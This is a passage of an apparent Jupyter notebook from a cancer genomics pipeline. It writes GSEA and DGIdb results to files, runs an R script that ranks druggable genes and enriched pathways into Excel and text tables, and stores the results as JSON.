# Write the gsea, dgidb, and gene results from step 5 to temp files so they're easily accessible by the R script.
# Each genelist has been loaded as an OrderedDict, which keeps it consistent with the order in which it arrived from the API.
# + deletable=true editable=true
# Dgidb results to file.
# structure is GENE and DRUG
for genelist in j5["dgidb_results"]:
filepath = os.path.join(workdir, "dgidb_{}_{}".format(sample_id, genelist))
print("writing {}".format(filepath))
with open(filepath, "w") as f:
for gene in j5["dgidb_results"][genelist]:
for drug in j5["dgidb_results"][genelist][gene]:
f.write("{} and {}\n".format(gene, drug))
f.write("\n") # prevent noeol or the R gets upset later
# + deletable=true editable=true
# GSEA results to file
# It's just a big unicode string
for genelist in j5["gsea_results"]:
filepath = os.path.join(workdir, "gsea_{}_{}".format(sample_id, genelist))
print("writing {}".format(filepath))
with open(filepath, "w") as f:
f.write(j5["gsea_results"][genelist])
f.write("\n") # prevent noeol or the R gets upset later
# + deletable=true editable=true
# Gene lists to file
# As an OrderedDict, they stay in the order from the json - sample\tpd_median
for genelist in j5["genelists"]:
filepath = os.path.join(workdir, "genes_{}_{}".format(sample_id, genelist))
print("writing {}".format(filepath))
if(genelist == "comm_up"):
with open(filepath, "w") as f:
f.write("Gene\n")
for gene in j5["genelists"][genelist]:
f.write("{}\n".format(gene))
else:
geneframe = pd.DataFrame.from_dict(
j5["genelists"][genelist],
orient="columns",
dtype="float64"
)
geneframe.to_csv(filepath, sep="\t", index_label="Gene")
print("Gene files written.")
# + [markdown] deletable=true editable=true
# Then, run the R script to aggregate gene lists.
#
# To install the openxlsx library if it's not available:
# `install.packages("openxlsx", dependencies=TRUE)`
# + deletable=true editable=true
# some abbreviated args to shorten the R script argument line --
# these will get reparsed immediately into new variable names
sid=sample_id
wd=workdir
pf=pathway_file
agf=all_gene
dgf=drug_gene
gaf=geneset_agg
gdf=geneset_details
xf=xlsx_path
# + deletable=true editable=true magic_args="Rscript - \"$sid\" \"$wd\" \"$pf\" \"$agf\" \"$dgf\" \"$gaf\" \"$gdf\" \"$xf\"" language="script"
#
# # version notes
# # v10 - fixed column names; now you can distinguish pc_up from pd_up
# # v11 - add overview tab to excel output <- expected to change
# # v12 - fixed duplication of data in two columns: pc-dgidb and pcd-dgidb
# # v13 - added "unique" to fix duplication of data when retrieving drug interactions,
# # e.g. for pancanUp_DGIdb
# # v14 - add ranking to drugs
# # v15 - export ranking to drugs in text as well as xlsx
# # further version notes listed above
#
# # Libraries
# library(reshape2)
# library(data.table)
# library(openxlsx)
# Sys.setenv(R_ZIPCMD= "/usr/bin/zip") # Needed for xls generation
#
# # Function - combine gsea & dgidb into an excel worksheet
# # Dir must not contain gsea_ and dgidb_ files that don't pertain to the sample
#
# combine.gsea.dgidb<-function(sampleID,
# dataDir,
# pathwayFile,
# allGeneAggFilename,
# druggableGeneAggFilename,
# geneSetAggFilename,
# geneSetDetailsFilename,
# xlF
# ){
#
# print(paste("Processing sample: ", sampleID)) # ETK DEBUG
#
#
# gseaEmptyFileSizeMaximum=175
# dgiDbEmptyFileSize=1
#
# ###
# ### setup
# ###
#
# options(stringsAsFactors=FALSE)
#
# read.txt<-function (file="", sep="\t", header=TRUE,row.names=NULL, quote="", ...){
# print(paste("Reading file: ", file))
# read.table(file, sep= sep, header= header, row.names= row.names, quote= quote, ...)
# }
#
# write.txt<-function (x, file="", quote=FALSE, sep="\t", row.names=FALSE, ...){
# write.table(x, file, quote=quote, sep=sep, row.names=row.names, ...)
# }
#
# ###
# ### load generic pathways
# ###
# allPathwaysFileRaw=pathwayFile
#
# allPathwaysRaw=scan(allPathwaysFileRaw, what="list", sep="\n")
# maxLen=0
# allPathwaysMatrixList=lapply(allPathwaysRaw, function(x) {
# y1=strsplit(x, "\t")[[1]];
# y2= y1[3:length(y1)];
# matrix(data=c(rep(y1[1], length=length(y2)), y2), ncol=2, byrow=FALSE)})
# allPathwaysDF <-data.frame(do.call("rbind", allPathwaysMatrixList))
# colnames(allPathwaysDF)=c("GeneSet", "Gene")
#
# setwd(dataDir)
#
#
# ###
# ### load genes in lists, e.g. pancan, panDisease and top 5pct
# ###
# geneMeta=data.frame(fn=list.files(,paste0("genes_", sampleID, "*")))
# # currently, this imports the following files:
# # genes_[sampleID]_comm_up,
# # genes_[sampleID]_pc_down,
# # genes_[sampleID]_pc_up,
# # genes_[sampleID]_pd_down,
# # genes_[sampleID]_pd_up,
# # genes_[sampleID]_top5
# geneMeta $sampleName= sampleID# lgCommonSubstring(geneMeta $fileID)
# geneMeta $dataTag=gsub(paste0("^.*",sampleID, "_"), "", geneMeta $fn)
# geneMeta=subset(geneMeta, ! grepl(".xlsx$", fn))
#
# # make matrix of genes v lists
# # if gene list is empty, return empty dataframe rather than throwing error
# geneDataRaw=lapply(geneMeta $fn, read.txt) #("genes_SRR1988322b")
# geneNameAndTag=Reduce("rbind",lapply(1:nrow(geneMeta),
# function(x) {
# if(length(geneDataRaw[[x]][,1]) == 0){
# data.frame()
# } else{
# data.frame(
# gene= geneDataRaw[[x]][,1],
# sampleName= geneMeta $sampleName[x] ,
# dataTag = geneMeta $dataTag[x])
# }}
# ))
# geneByThGeneListOrig=dcast(geneNameAndTag, gene ~ dataTag, value.var="sampleName",
# fun.aggregate=length)
#
#
# # If a list, eg pc_up, has no outliers, its column will be missing from
# # geneByThGeneListOrig . Add any missing columns back in, with values all 0
# expectedGeneSetsFromFile=c("comm_up", "pc_down", "pc_up", "pd_down", "pd_up", "top5")
# geneSetColsToAdd=! expectedGeneSetsFromFile %in% colnames(geneByThGeneListOrig)
# if (sum(geneSetColsToAdd)>0){
# emptyGeneSetToAdd=data.frame( matrix(,
# ncol=sum(geneSetColsToAdd),
# nrow=nrow(geneByThGeneListOrig),
# data=0))
#
# colnames(emptyGeneSetToAdd)=expectedGeneSetsFromFile[geneSetColsToAdd]
# geneByThGeneList=cbind(geneByThGeneListOrig, emptyGeneSetToAdd)
#
# # Put the columns back in their original order
# geneByThGeneList= geneByThGeneList[, c("gene", expectedGeneSetsFromFile)]
# } else {
# geneByThGeneList= geneByThGeneListOrig
# }
#
# oldnames=colnames(geneByThGeneList)[2:ncol(geneByThGeneList)]
# colnames(geneByThGeneList)=c("gene", paste0("inSet_", oldnames))
# geneByThGeneList$thListsContainingGene=rowSums(
# as.matrix(geneByThGeneList[2:ncol(geneByThGeneList)]))
#
#
# ###
# ### identify which genes are druggable
# ###
#
# # get metadata from dgidb files
# dgMeta=data.frame(fn=list.files(,"dgidb_."))
# dgMeta$sampleName= sampleID
# dgMeta$dataTag=gsub(paste0("^.*",sampleID, "_"), "", dgMeta $fn)
# dgMeta$fileInfo=file.info(dgMeta $fn)
# dgMeta =subset(dgMeta, ! grepl(".xlsx$", fn))
#
# dgMeta $empty = dgMeta $fileInfo$size== dgiDbEmptyFileSize
# dgMetaNonEmpty=subset(dgMeta, !empty)
#
#
# # make matrix of genes v lists
# dgDataRaw=lapply(dgMetaNonEmpty $fn, read.txt, header=F)
# #("dgidb_export_2017-01-03.SRR1988322c.tsv")
#
# dgDataInteractions=data.frame(rawInteraction=unlist(lapply(dgDataRaw, function(x) x$V1)))
# dgDataInteractions$gene=gsub(" .* .*", "", dgDataInteractions $rawInteraction)
# dgDataInteractions$drug=gsub("^.*and ", "", dgDataInteractions $rawInteraction)
# dgDataGeneNames=lapply(dgDataRaw, function(x) unique(gsub(" .* .*", "", x$V1)))
# dgDataGeneNameAndTag=Reduce(
# "rbind",lapply(1:nrow(dgMetaNonEmpty),
# function(x) data.frame(druggableGene=dgDataGeneNames[[x]],
# sampleName=dgMeta$sampleName[x] ,
# dataTag = dgMetaNonEmpty $dataTag[x])))
# druggableGeneByThGeneList=dcast(dgDataGeneNameAndTag, druggableGene ~ dataTag,
# value.var="sampleName", fun.aggregate=length)
# druggableGeneByThGeneList $thListsContainingGene =rowSums(
# as.matrix(druggableGeneByThGeneList[2:ncol(druggableGeneByThGeneList)]))
# druggableGeneByThGeneList = druggableGeneByThGeneList[
# order(druggableGeneByThGeneList $thListsContainingGene, decreasing=TRUE),]
#
# geneByThGeneList$druggableGene=
# geneByThGeneList$gene %in% druggableGeneByThGeneList$druggableGene
#
# geneByThGeneList2= geneByThGeneList
#
# colsToCheck=2:7
# setsToConsider=colnames(geneByThGeneList2 ) [colsToCheck]
#
# geneByThGeneList2$setCombo=apply(
# geneByThGeneList2[, colsToCheck], 1,
# function(x) gsub("inSet_", "", paste(setsToConsider[as.logical(x)], collapse=",")))
# # x= geneByThGeneList2[21,]
#
# geneByThGeneList2$setCombo[geneByThGeneList2$druggableGene]=paste0(
# geneByThGeneList2$setCombo[geneByThGeneList2$druggableGene], ",druggable")
#
# write.txt(geneByThGeneList, paste(allGeneAggFilename))
#
#
# ###
# ### analyze gene sets enriched pathways
# ###
#
# # get metadata from gsea files
# gseaMeta=data.frame(fn=list.files(,"gsea_.*"))
# gseaMeta$sampleName=sampleID # lgCommonSubstring(gseaMeta$fileID)
# gseaMeta$dataTag=gsub(paste0("^.*",sampleID, "_"), "", gseaMeta $fn)
# gseaMeta =subset(gseaMeta, ! grepl(".xlsx$", fn))
# gseaMeta =subset(gseaMeta, ! grepl(".json$", fn))
#
# gseaMeta $fileInfo=file.info(gseaMeta $fn)
# gseaMeta $empty = gseaMeta $fileInfo$size <= gseaEmptyFileSizeMaximum
# gseaMetaNonEmpty=subset(gseaMeta, !empty)
#
#
#
# gseaGeneSetListRaw <-list()
#
# ### identify pathways enriched per Th Gene List
# for (i in 1:nrow(gseaMetaNonEmpty)){
# # i=1
# #
# # pull locations out of multi-table gsea file
# #
# allGseaInfoRaw=scan(gseaMetaNonEmpty $fn[i], what="list", sep="\n",
# blank.lines.skip=FALSE)
# firstLineOfGeneSetTable=grep("^Gene Set Name", allGseaInfoRaw)
# afterEndOfGeneSetTable=grep("Gene/Gene Set Overlap Matrix", allGseaInfoRaw)
# allBlankLines=which(allGseaInfoRaw =="")
# lastLineOfGeneSetTable =sort(allBlankLines[allBlankLines<afterEndOfGeneSetTable],
# decreasing=TRUE)[2]-1
# firstLineOfGeneSet_GeneMatrix=grep("^Entrez Gene Id", allGseaInfoRaw)
#
# #
# # pull gene set name table out of multi-table gsea file
# #
# geneSetTable=read.txt(gseaMetaNonEmpty $fn[i], fill=T, comment.char="", quote="",
# skip= firstLineOfGeneSetTable-1,
# nrows= lastLineOfGeneSetTable -firstLineOfGeneSetTable)
# # geneSetTable= allGseaInfo[(1+firstLineOfGeneSetTable): lastLineOfGeneSetTable,1:7]
# colnames(geneSetTable)=gsub(" ", "_", c("GeneSetName", "N Genes in Gene Set (K)",
# "Description", "N Genes in Overlap (k)",
# "k/K", "p-value", "FDR q-value"))
# # dput(as.character(allGseaInfo[firstLineOfGeneSetTable,1:7]))
#
# gseaGeneSetListRaw[[i]]= geneSetTable
# names(gseaGeneSetListRaw[i])= gseaMetaNonEmpty $fileID[i]
# }
#
#
# ###
# ### create a table listing all reported gene sets and identify which ThGeneLists
# ### they're enriched in
# ###
#
# names(gseaGeneSetListRaw)= gseaMetaNonEmpty$dataTag
#
# gseaEnrichedGeneSetsList=lapply(gseaGeneSetListRaw, function(x) unique(x$GeneSetName))
#
# gseaEnrichedGeneSetsByThGeneList=Reduce(
# "rbind",lapply(1:nrow(gseaMetaNonEmpty),
# function(x) data.frame(
# GeneSet= gseaEnrichedGeneSetsList[[x]],
# sampleName= gseaMetaNonEmpty $sampleName[x] ,
# dataTag = gseaMetaNonEmpty $dataTag[x])))
#
# gseaEnrichedGeneSetsByThGeneList$dataTag=
# paste0("enriched_in_", gseaEnrichedGeneSetsByThGeneList$dataTag)
#
# enrichedGeneSet=dcast(
# gseaEnrichedGeneSetsByThGeneList[,c("GeneSet", "sampleName", "dataTag")],
# GeneSet ~ dataTag, value.var="sampleName", fun.aggregate=length)
#
# # add cols when nothing in list is enriched, e.g. "enriched_in_pc_up"
# expectedThGeneSetsWithGeneSetAnalysis=c("comm_up", "pc_up", "pd_up", "top5")
# enrichedColsToAdd=! paste0(
# "enriched_in_", expectedThGeneSetsWithGeneSetAnalysis) %in% colnames(enrichedGeneSet)
# if (sum(enrichedColsToAdd)>0){
# emptyEnrichedToAdd= data.frame(
# matrix(, ncol=sum(enrichedColsToAdd), nrow=nrow(enrichedGeneSet), data=0))
# colnames(emptyEnrichedToAdd)=paste0(
# "enriched_in_", expectedThGeneSetsWithGeneSetAnalysis[enrichedColsToAdd])
#
# allColEnrichedGeneSet=cbind(enrichedGeneSet, emptyEnrichedToAdd)
# allColEnrichedGeneSet= allColEnrichedGeneSet[
# , c("GeneSet", paste0("enriched_in_", expectedThGeneSetsWithGeneSetAnalysis))]
# } else {
# allColEnrichedGeneSet= enrichedGeneSet
# }
#
# # add overlap_genes cols
# tempAdd= data.frame(matrix(, ncol=ncol(allColEnrichedGeneSet)-1,
# nrow=nrow(allColEnrichedGeneSet)))
# colnames(tempAdd)=gsub("enriched", "overlap_genes",
# colnames(allColEnrichedGeneSet[2:ncol(allColEnrichedGeneSet)]))
#
# fullEnrichedGeneSet=cbind(allColEnrichedGeneSet, tempAdd)
#
# fullEnrichedGeneSet $totalThListsEnriched=rowSums(
# as.matrix(fullEnrichedGeneSet[, grepl("enriched_in", colnames(fullEnrichedGeneSet ))]))
#
# fullEnrichedGeneSet = fullEnrichedGeneSet[
# order(fullEnrichedGeneSet $totalThListsEnriched, decreasing=TRUE),]
#
#
# ###
# ### identify gene sets that contain druggable genes
# ###
# fullEnrichedGeneSet$enrichedSetContainsDruggableGene=NA
# fullEnrichedGeneSet$anySetContainsDruggableGene=NA
# druggableGeneList= subset(geneByThGeneList, druggableGene )$gene
# # ThSetEnrichedCols=grep("enriched_in", colnames(fullEnrichedGeneSet), value=TRUE)
# ThGeneListEnrichedCols=grep("enriched_in", colnames(fullEnrichedGeneSet), value=TRUE)
# ThGeneListNamesFromCols=gsub("enriched_in_", "", ThGeneListEnrichedCols)
# # ThSetNamesFromCols=gsub("enriched_in_", "", ThSetEnrichedCols)
# # ThSet_inSetCols=grep("inSet_", colnames(geneByThGeneList), value=TRUE)
# # ThSetNamesFrom_inSetCols=gsub("inSet_", "", ThSet_inSetCols)
# ThGeneList_inSetCols =gsub("enriched_in_", "inSet_", ThGeneListEnrichedCols)
# ThSetEnrichedCols=grep("enriched_in", colnames(fullEnrichedGeneSet), value=TRUE)
#
# ThGeneListNamesFrom_inSetCols=gsub("inSet_", "", ThGeneList_inSetCols)
#
#
# for (i in 1:nrow(fullEnrichedGeneSet)){
# # i=1
# thisGs=fullEnrichedGeneSet$GeneSet[i]
# enrichedInThGeneList= ThGeneListNamesFromCols [
# fullEnrichedGeneSet [i,ThGeneListEnrichedCols]==1]
# genesInThisPathway=subset(allPathwaysDF, GeneSet== thisGs)$Gene
# druggableGenesInThisPathway=subset(
# allPathwaysDF, GeneSet== thisGs & Gene %in% druggableGeneList)$Gene
# if (length(druggableGenesInThisPathway)!=0){
# fullEnrichedGeneSet$anySetContainsDruggableGene[i]=TRUE
# # test whether those genes are in a list with this gene set enriched
# anyDruggableGenePresentInset= ThGeneListNamesFrom_inSetCols [colSums(as.matrix(
# subset(geneByThGeneList,
# gene %in% druggableGenesInThisPathway)[, ThGeneList_inSetCols]))>0]
#
# # for each GSEA gene set, get the list of genes overlapping with each ThLists
# theseGenesByThGeneList=subset(geneByThGeneList, gene %in% genesInThisPathway)
# setsWithGenesInPathway= ThGeneList_inSetCols [colSums(as.matrix(
# theseGenesByThGeneList[, ThGeneList_inSetCols]))>0]
# genesInPathways=unlist(lapply(
# setsWithGenesInPathway,
# function(x) paste(
# theseGenesByThGeneList$gene[as.logical(theseGenesByThGeneList[, x])],
# collapse=",")))
# fullEnrichedGeneSet[i, gsub("inSet", "overlap_genes_in", setsWithGenesInPathway)]=
# genesInPathways
#
# if (length(intersect(enrichedInThGeneList, anyDruggableGenePresentInset))>0){
# fullEnrichedGeneSet$enrichedSetContainsDruggableGene[i]=TRUE
# }
# } else { # remove this pathway from enriched pathways since it's not druggable.
# fullEnrichedGeneSet$anySetContainsDruggableGene[i]=FALSE
# fullEnrichedGeneSet$enrichedSetContainsDruggableGene[i]=FALSE
# }
# }
#
#
# fullEnrichedGeneSetWithDruggableThListGene=subset(
# fullEnrichedGeneSet,
# anySetContainsDruggableGene)[, grep("anySetContainsDruggableGene",
# colnames(fullEnrichedGeneSet),
# invert=TRUE, value=TRUE)]
#
# ### MAKE mega table
#
# system.time(genesInGeneSets<-merge(
# allPathwaysDF, geneByThGeneList, by.x="Gene", by.y="gene"))
#
# colnames(genesInGeneSets)=gsub("inSet_", "geneInSet_", colnames(genesInGeneSets))
#
# megaTable=merge(genesInGeneSets, fullEnrichedGeneSet, by="GeneSet")
#
# colnames(megaTable)=gsub("enriched_in_", "pathwayEnrichedInSet_", colnames(megaTable))
#
# megaTable$sumForRanking= rowSums(
# as.matrix(megaTable[,c("thListsContainingGene", "totalThListsEnriched")], na.rm=TRUE))
#
# megaTable= megaTable[order(megaTable$sumForRanking),]
#
#
# genesInThListsByGeneSets<-NULL
# for (i in 1:nrow(fullEnrichedGeneSet)){
# #i=1
# thisGs=enrichedGeneSet$GeneSet[i]
# # dim(subset(megaTable, GeneSet==thisGs));
# #length(unique(subset(megaTable, GeneSet==thisGs)$Gene))
# genesInThListsByGeneSets=rbind(
# genesInThListsByGeneSets,
# data.frame(geneSet= thisGs,
# countInThLists=length(unique(subset(megaTable, GeneSet==thisGs)$Gene))))
# }
#
# ###
# ### Gene set overview and drug lists
# ###
#
# # add gene-specific information to gene set list
# fullEnrichedGeneSetWithDruggableThListGene$druggableGenesInThLists=
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(thisGs) paste(
# unique(subset(genesInGeneSets,
# GeneSet %in% thisGs & druggableGene)$Gene),
# collapse=", ")))
#
#
# fullEnrichedGeneSetWithDruggableThListGene$allMemberGenesInThLists=
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(thisGs) paste(unique(subset(genesInGeneSets,
# GeneSet %in% thisGs)$Gene),
# collapse=", ")))
#
#
# fullEnrichedGeneSetWithDruggableThListGene $drugs=
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(x) paste(
# unique(subset(dgDataInteractions,
# gene %in% subset(genesInGeneSets,
# GeneSet ==x)$Gene)$drug),
# collapse=", ")))
#
# fullEnrichedGeneSetWithDruggableThListGene$druggableGeneWithDrug =
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(x) paste(
# unique(subset(dgDataInteractions, gene %in% subset(
# genesInGeneSets, GeneSet ==x)$Gene)$rawInteraction),
# collapse=", ")))
#
# write.txt(fullEnrichedGeneSetWithDruggableThListGene, file=paste(geneSetAggFilename))
#
# # druggable pathways
# dp=unique(megaTable[,c("GeneSet", "druggableGene")])
# druggableGeneSets=subset(dp, druggableGene)$GeneSet
#
# megaTable$druggablePathway= megaTable $GeneSet %in% druggableGeneSets
#
# dim(subset(megaTable, druggablePathway))
#
# ###
# ### Geneset TABLES
# ###
#
# commonGSEAcolsDF=unique(
# Reduce("rbind",lapply(
# gseaGeneSetListRaw,
# function(x) unique(x[,c("GeneSetName", "N_Genes_in_Gene_Set_(K)",
# "Description")]))))
#
# multiListGeneSets<-commonGSEAcolsDF
#
#
# ## add support for values not present in gseaMetaNonEmpty
# # for (i in 1:nrow(gseaMetaNonEmpty)){
# for (i in 1:nrow(gseaMeta)){
# thisDataTag=gseaMeta$dataTag[i]
# if (thisDataTag %in% names(gseaGeneSetListRaw)){
# thisWide= gseaGeneSetListRaw[[thisDataTag]]
# colnames(thisWide)[4:7]=paste0(thisDataTag, "_", colnames(thisWide)[4:7])
# multiListGeneSets =merge(multiListGeneSets,
# thisWide[,c(1,4:7)], by="GeneSetName", all=TRUE)
# } else {
# genericColNames= colnames(gseaGeneSetListRaw[[1]][,4:7])
# emptyColsToAdd= data.frame(matrix(, ncol=length(genericColNames),
# nrow=nrow(multiListGeneSets)))
# colnames(emptyColsToAdd)=paste0(thisDataTag, "_", genericColNames)
# multiListGeneSets =cbind(multiListGeneSets, emptyColsToAdd)
# }
# }
#
#
# # add contains druggable gene found in one gene list
# write.txt(multiListGeneSets, file=paste(geneSetDetailsFilename))
#
#
# ###
# ### create linh's overview
# ###
# colsToSkip=3
#
# pancanUp=geneByThGeneList[geneByThGeneList $inSet_pc_up==1,]$gene
# pancanDown=geneByThGeneList[geneByThGeneList $inSet_pc_down==1,]$gene
# pandiseaseUp=geneByThGeneList[geneByThGeneList $inSet_pd_up==1,]$gene
# pandiseaseDown=geneByThGeneList[geneByThGeneList $inSet_pd_down==1,]$gene
# top5=geneByThGeneList[geneByThGeneList $inSet_top5==1,]$gene
# pcdUp=intersect(pancanUp, pandiseaseUp)
# pcdDown=intersect(pancanDown, pandiseaseDown)
#
# pancanUp_DGIdb=unique(subset(dgDataInteractions, gene %in% pancanUp)$rawInteraction)
# pandiseaseUp_DGIdb=unique(subset(dgDataInteractions, gene %in% pandiseaseUp)$rawInteraction)
# pcdUp_DGIdb=unique(subset(dgDataInteractions, gene %in% pcdUp)$rawInteraction)
# top5_DGIdb=unique(subset(dgDataInteractions, gene %in% top5)$rawInteraction)
#
# colnames_pc=c("Pan-cancer Up", "Pan-cancer Down", "DGIDB", "TARGET", "GSEA", "k/K", "FDR")
# colnames_pcd= colnames_pc
# colnames_pcd[1:2]=c("PCD Up", "PCD Down")
# colnames_pd= colnames_pc
# colnames_pd[1:2]=c("Pan-disease Up", "Pan-disease Down")
# colnames_top5= colnames_pc[-2]
# colnames_top5[1]=c("top5")
#
# colnameList=list(colnames_pc, colnames_pcd, colnames_pd, colnames_top5)
#
# overviewlist=list(pancanUp, pancanDown, pancanUp_DGIdb, pcdUp, pcdDown, pcdUp_DGIdb,
# pandiseaseUp, pandiseaseDown, pandiseaseUp_DGIdb, top5, top5_DGIdb)
#
# overviewDF=data.frame(matrix(data="", nrow=1+max(sapply(overviewlist, length)),
# ncol=length(overviewlist)))
#
# for (i in 1:length(overviewlist)){
# thisText=overviewlist[[i]]
# if (length(thisText)>0) overviewDF[2:(1+length(thisText)),i]= thisText
# }
# overviewDF[1,]= c(colnames_pc[1:3], colnames_pcd[1:3], colnames_pd[1:3],
# colnames_top5[1:2])
#
# overviewDF2=data.frame(matrix(data="", nrow=1+max(sapply(overviewlist, length)),
# ncol=length(unlist(colnameList))+3* colsToSkip))
# overviewDF2[1,]= c(colnames_pc, rep("", colsToSkip), colnames_pcd, rep("", colsToSkip),
# colnames_pd, rep("", colsToSkip), colnames_top5)
#
# overviewDF2[,1:3]= overviewDF[,1:3] # pc
# overviewDF2[,11:13]= overviewDF[,4:6] # pd
# overviewDF2[,21:23]= overviewDF[,7:9] # pcd
# overviewDF2[,31:32]= overviewDF[,10:11] # top5
#
#
# ###
# ### prioritized druggable genes
# ###
#
# # broadest list
#
# prioritizedDruggableGenes=druggableGeneByThGeneList
#
#
#
# # candidate genes are:
# # upoutlier or top five percent (not down outlier) genes marked druggable by dgidb
#
# # consider whether the list is (yes/no)
# # in pancan up outliers
# # in pandisease up outliers
#
# #
# # names of gene-containing pathways that are enriched in a treehouse gene set
# # (like pancan up outliers or pandisease up outliers)
# #
# pathwayByEnrichedList=lapply(ThSetEnrichedCols, function(ei) unlist(
# lapply(prioritizedDruggableGenes$druggableGene,
# function(x) paste(
# subset(allPathwaysDF,
# Gene ==x &
# GeneSet %in% fullEnrichedGeneSetWithDruggableThListGene$GeneSet[
# fullEnrichedGeneSetWithDruggableThListGene[,ei]==1])$GeneSet,
# collapse=","))))
#
# # namesOfEnrichedPathways=data.frame(t(cbindList(pathwayByEnrichedList)))
# #namesOfEnrichedPathways =data.frame(t(Reduce("cbind", pathwayByEnrichedList)),
# # row.names=NULL)
# namesOfEnrichedPathways=data.frame(Reduce("cbind", pathwayByEnrichedList))
#
# colnames(namesOfEnrichedPathways)= ThSetEnrichedCols
#
# #
# # count of gene-containing pathways that are enriched in a treehouse gene set
# # (like pancan up outliers or pandisease up outliers)
# #
# pathwayCountByEnrichedList=lapply(
# ThSetEnrichedCols,
# function(ei) unlist(lapply(
# prioritizedDruggableGenes$druggableGene,
# function(x) length(
# subset(allPathwaysDF,
# Gene ==x &
# GeneSet %in% fullEnrichedGeneSetWithDruggableThListGene$GeneSet[
# fullEnrichedGeneSetWithDruggableThListGene[,ei]==1])$GeneSet))))
#
# countsOfEnrichedPathways=data.frame(Reduce("cbind", pathwayCountByEnrichedList))
# colnames(countsOfEnrichedPathways)=paste0("count_of_", ThSetEnrichedCols)
#
# prioritizedDruggableGenesWithPathwayAndCount=cbind(
# prioritizedDruggableGenes, cbind(
# namesOfEnrichedPathways,
# countsOfEnrichedPathways)[,c(rbind(ThSetEnrichedCols,
# paste0("count_of_", ThSetEnrichedCols)))])
#
#
# # all enriched pathways
# prioritizedDruggableGenesCorrespondingPathways =lapply(
# prioritizedDruggableGenes$druggableGene, function(x) subset(
# allPathwaysDF,
# Gene ==x & GeneSet %in% fullEnrichedGeneSetWithDruggableThListGene$GeneSet))
#
# prioritizedDruggableGenesWithPathwayAndCount$allEnrichedPathways=unlist(lapply(
# prioritizedDruggableGenesCorrespondingPathways,
# function(x) paste(x$GeneSet, collapse=",")))
#
# prioritizedDruggableGenesWithPathwayAndCount $countOfAllEnrichedPathways=unlist(lapply(
# prioritizedDruggableGenesCorrespondingPathways, function(x) length(x$GeneSet)))
#
#
# # is in a pathways that is enriched in the same treehouse gene sets the gene is in
# # (like pancan up outliers or pandisease up outliers)
#
#
#
# # a drug corresponding to the gene has been recommended before
#
# # a drug corresponding to the gene has been recommended for a sample with one of the
# # diseases identified by tumor map
#
# # is gene an up-pancan outlier because of tissue signal? e.g. is it a btk/flt3 in AML,
# # in brain tumor, NGF -- (gain a point -- not explained by tissue specificity
# # e.g. 129
#
#
# # sheet format:
# # add to druggable genes
# # drug-containing pathways that are enriched only in pancancer
# # drug-containing pathways that are enriched only in pandisease
# # drug-containing pathways that are enriched in both pandisease and pancancer
#
#
#
# ###
# ### write amalgam excel workbook
# ###
#
# xlsxInputList=list(overview=overviewDF2,
# GeneSetDetailsPerList= multiListGeneSets,
# GeneSetAggregation= fullEnrichedGeneSetWithDruggableThListGene,
# druggableGeneAggregation= prioritizedDruggableGenesWithPathwayAndCount,
# allGeneAggregation= geneByThGeneList)
# names(xlsxInputList)[1]=paste(sampleID, "overview")
#
# write.txt(prioritizedDruggableGenesWithPathwayAndCount, file=druggableGeneAggFilename)
#
# write.xlsx(xlsxInputList,xlF, colNames=c(F, rep(T, length(xlsxInputList)-1)))
#
# # is it in a treehouse gene list (pcup or pcdown) and an enriched pathway
#
# # is the drug target in a pathway that's enriched in a gene list
#
# # in the druggable gene list, find drugs that are in both pdUp and pcUp
# # druggableGeneByThGeneList
#
# # if it's a drug we've recommended before that's good
#
# # a drug corresponding to the gene has been recommended before
#
# # a drug corresponding to the gene has been recommended for a sample with this disease before
# }
#
# #### Main ####
#
# args<-commandArgs(TRUE)
#
# sample.id<-args[1]
# data.base.dir<-args[2]
# pathway.file<-args[3]
# allgene.agg<-args[4]
# druggene.agg<-args[5]
# geneset.agg<-args[6]
# geneset.dets<-args[7]
# xlsx.filename<-args[8]
#
# combine.gsea.dgidb(sample.id, data.base.dir, pathway.file,
# allgene.agg, druggene.agg, geneset.agg, geneset.dets, xlsx.filename
# )
# + [markdown] deletable=true editable=true
# Move the newly generated files back to the sampledir from the tmpdir.
# + deletable=true editable=true
# !pwd
for output_file in [all_gene, drug_gene, geneset_agg, geneset_details, xlsx_path]:
src_path = os.path.join(workdir, output_file)
print("Moving {} to {}".format(src_path, output_file))
os.rename(src_path, output_file)
# + [markdown] deletable=true editable=true
# Aggregate the newly generated files (except for the Excel file) into the json output and save it to a file. Load them as OrderedDicts to preserve column order, with dtype str
# to preserve exact contents (e.g. don't translate TRUE to a bool), and na_filter=False to avoid
# translating Rscript's "NA"s to null or empty string.
# + deletable=true editable=true
j["all_gene_aggregation"] = json.loads(
pd.read_csv(all_gene, delimiter="\t", index_col="gene", dtype="str", na_filter=False
).to_json(orient="columns"),object_pairs_hook=OrderedDict)
j["druggable_gene_aggregation"] = json.loads(
pd.read_csv(drug_gene, delimiter="\t", index_col="druggableGene", dtype="str",
na_filter=False).to_json(orient="columns"), object_pairs_hook=OrderedDict)
j["gene_set_aggregation"] = json.loads(
pd.read_csv(geneset_agg, delimiter="\t", index_col="GeneSet", dtype="str", na_filter=False
).to_json(orient="columns"), object_pairs_hook=OrderedDict)
j["gene_set_details_per_list"] = json.loads(
pd.read_csv(geneset_details, delimiter="\t", index_col="GeneSetName", dtype="str",
na_filter=False).to_json(orient="columns"), object_pairs_hook=OrderedDict)
with open(c["json"]["7"], "w") as jsonfile:
json.dump(j, jsonfile, indent=2)
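# + [markdown] deletable=true editable=true
# The round-trip used above (DataFrame → JSON string → OrderedDict) can be sanity-checked on a toy frame; the frame and column names here are purely illustrative, not from the pipeline:
# + deletable=true editable=true

```python
from collections import OrderedDict
import json

import pandas as pd

# Hypothetical two-row table standing in for one of the R outputs;
# values are already strings, mimicking dtype="str" + na_filter=False.
df = pd.DataFrame({"gene": ["TP53", "EGFR"], "flag": ["TRUE", "NA"]})

# to_json/json.loads with object_pairs_hook preserves column order
# and keeps "NA" as a literal string rather than a null.
d = json.loads(df.set_index("gene").to_json(orient="columns"),
               object_pairs_hook=OrderedDict)

print(list(d.keys()))     # -> ['flag']
print(d["flag"]["EGFR"])  # -> NA
```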
# + [markdown] deletable=true editable=true
# Finally, delete the tmpfiles and tmpdir used. Iterate through the files in j5 as those are the tmpfiles created.
# + deletable=true editable=true
listtypemap = {"genelists" : "genes", "dgidb_results" : "dgidb", "gsea_results" : "gsea"}
